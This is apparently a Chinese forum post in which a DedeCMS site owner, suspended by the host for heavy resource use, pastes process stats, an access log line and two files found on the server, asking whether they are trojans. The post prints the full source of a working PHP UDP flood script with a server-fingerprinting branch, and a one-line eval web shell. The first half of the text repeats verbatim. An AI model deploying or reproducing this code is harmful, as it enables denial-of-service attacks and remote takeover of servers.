我的网站是dedecms的程序,最近(一个月之间)两次被关停,都是提示因为耗资源。
我查看了一下耗资源原因,有这样两个文件占用了很大资源。[耗资源证据]:
时刻(SECONDS SINCE EPOCH) PID THR PRI NICE SIZE RES STATE C TIME WCPU COMMAND
20111013180000(1318500000): 37107 1 104 0 18404K 12852K CPU6 0 0:16 97.11% php
20111013180600(1318500360): 39894 1 105 0 18404K 12852K RUN 4 0:18 94.36% php 一。116.255.195.25 - - [13/Oct/2011:18:01:54 +0800] "GET /data/cache/dueuro.php?host=174.139.87.229&port=80&time=18 HTTP/1.1" 200 1 "-" "Mozilla/4.0"text/html "/htdocs/data/cache/dueuro.php"/htdocs/data/cache/dueuro.php 的源代码如下:<?php
set_time_limit(999999);
$host = $_GET['host'];
$port = $_GET['port'];
$exec_time = $_GET['time'];
$Sendlen = 128;
$packets = 0;
ignore_user_abort(True);if (StrLen($host)==0 or StrLen($port)==0 or StrLen($exec_time)==0){
if (StrLen($_GET['rat'])<>0){
echo $_GET['rat'].$_SERVER["HTTP_HOST"]."|".GetHostByName($_SERVER['SERVER_NAME'])."|".php_uname()."|".$_SERVER['SERVER_SOFTWARE'].$_GET['rat'];
exit;
}
echo "err";
exit;
}for($i=0;$i<$Sendlen;$i++){
$out .= "A";
}$max_time = time()+$exec_time;
while(1){
$packets++;
if(time() > $max_time or $exec_time != 18){
break;
}
$fp = fsockopen("udp://$host", $port, $errno, $errstr, 5);
if($fp){
fwrite($fp, $out);
fclose($fp);
}
}
?> 另外,我还在data目录中发现了x.php文件,源代码如下:
<?php eval($_REQUEST[O]);//?>a这是不是木马呢?
我查看了一下耗资源原因,有这样两个文件占用了很大资源。[耗资源证据]:
时刻(SECONDS SINCE EPOCH) PID THR PRI NICE SIZE RES STATE C TIME WCPU COMMAND
20111013180000(1318500000): 37107 1 104 0 18404K 12852K CPU6 0 0:16 97.11% php
20111013180600(1318500360): 39894 1 105 0 18404K 12852K RUN 4 0:18 94.36% php 一。116.255.195.25 - - [13/Oct/2011:18:01:54 +0800] "GET /data/cache/dueuro.php?host=174.139.87.229&port=80&time=18 HTTP/1.1" 200 1 "-" "Mozilla/4.0"text/html "/htdocs/data/cache/dueuro.php"/htdocs/data/cache/dueuro.php 的源代码如下:<?php
set_time_limit(999999);
$host = $_GET['host'];
$port = $_GET['port'];
$exec_time = $_GET['time'];
$Sendlen = 128;
$packets = 0;
ignore_user_abort(True);if (StrLen($host)==0 or StrLen($port)==0 or StrLen($exec_time)==0){
if (StrLen($_GET['rat'])<>0){
echo $_GET['rat'].$_SERVER["HTTP_HOST"]."|".GetHostByName($_SERVER['SERVER_NAME'])."|".php_uname()."|".$_SERVER['SERVER_SOFTWARE'].$_GET['rat'];
exit;
}
echo "err";
exit;
}for($i=0;$i<$Sendlen;$i++){
$out .= "A";
}$max_time = time()+$exec_time;
while(1){
$packets++;
if(time() > $max_time or $exec_time != 18){
break;
}
$fp = fsockopen("udp://$host", $port, $errno, $errstr, 5);
if($fp){
fwrite($fp, $out);
fclose($fp);
}
}
?> 另外,我还在data目录中发现了x.php文件,源代码如下:
<?php eval($_REQUEST[O]);//?>a这是不是木马呢?
<?php eval($_REQUEST[O]);//?>a
当访问x.php时在url中带php的代码的字符串,eval将还原成php语义的代码执行。